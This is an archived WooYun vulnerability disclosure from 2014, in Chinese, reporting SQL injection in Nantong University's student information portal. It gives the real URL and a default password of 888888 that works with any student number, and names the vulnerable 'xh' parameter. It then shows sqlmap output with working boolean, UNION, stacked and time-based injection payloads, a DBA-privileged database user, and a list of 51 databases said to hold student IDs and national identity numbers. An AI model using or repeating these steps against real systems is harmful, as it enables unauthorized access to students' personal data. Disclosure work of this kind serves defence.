乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-18: 细节已通知厂商并且等待厂商处理中 2014-12-23: 厂商已经主动忽略漏洞,细节向公众公开
妈呀,吓死我了,我只是上去查询一下我的信息,竟然发现一个注入点,里面的东西貌似有点多啊。。。。。。。
南通大学信息服务平台:http://my.ntu.edu.cn/学号任意输入一个,密码:888888进去后点击左边计算机等级考试报名信息查询,那个输入框存在注入抓一下包,放进sqlmap,发现:
current user is DBA: True
里面的东西好像不少。。。。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: xh Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: xh=1314012162' AND 5675=5675 AND 'fCAW'='fCAW Type: UNION query Title: Generic UNION query (NULL) - 28 columns Payload: xh=1314012162' UNION ALL SELECT NULL,NULL,NULL,CHAR(58)+CHAR(108)+CHAR(107)+CHAR(121)+CHAR(58)+CHAR(73)+CHAR(97)+CHAR(113)+CHAR(68)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(77)+CHAR(120)+CHAR(66)+CHAR(58)+CHAR(119)+CHAR(101)+CHAR(116)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: xh=1314012162'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: xh=1314012162' WAITFOR DELAY '0:0:5'-----[13:38:30] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[13:38:30] [INFO] fetching database namesavailable databases [51]:[*] CarAccessories[*] card[*] DataMing[*] db_19[*] db_B2CShop[*] dfdffddf[*] EduManager[*] exam[*] examSys[*] GradeSys[*] india[*] jadedatabases[*] jlxt[*] jobSubmit[*] jsxx[*] LoginDate[*] master[*] model[*] msdb[*] mvcdb[*] MyHotelManager[*] newssystem[*] NTU[*] NTUINFO[*] ntusso[*] Photography[*] pksrd[*] pksrd2[*] qkgl[*] ReportServer[*] ReportServerTempDB[*] ryxx[*] SampleDB[*] SHTFTS[*] SingleSignOn[*] SQL02_TEMP[*] sqsj[*] SSO[*] stock[*] Tea[*] tempdb[*] test[*] test1123[*] TestExcelImp[*] testLogin[*] TestYKT[*] user_login[*] xsxx[*] yjsgl_new[*] ykt[*] yysd
里面有班级、学号、身份证等等反正很多就是了。。。。
同上
不知道
危害等级:无影响厂商忽略
忽略时间:2014-12-23 14:52
暂无